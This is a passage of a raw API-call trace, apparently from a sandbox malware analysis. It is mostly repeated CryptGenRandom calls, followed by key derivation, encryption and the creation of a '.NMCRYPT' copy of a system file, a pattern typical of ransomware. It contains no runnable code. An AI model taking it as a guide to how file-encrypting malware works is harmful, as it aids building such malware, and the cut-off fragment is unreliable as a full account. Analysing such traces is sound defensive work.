pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.481] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.482] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.485] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0153.485] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0153.486] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447ac | out: phHash=0x1d4447ac) returned 1 [0153.486] CryptHashData (hHash=0x9ad6b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.486] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad6b8, dwFlags=0x4, phKey=0x1d4447b0 | out: phKey=0x1d4447b0*=0x9ad338) returned 1 [0153.486] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0153.486] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0153.486] wcslen (_String="\\\\?\\") returned 0x4 [0153.486] CryptDuplicateKey (in: hKey=0x9ad338, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad738) returned 1 [0153.486] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0153.486] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0153.486] GetFileSizeEx 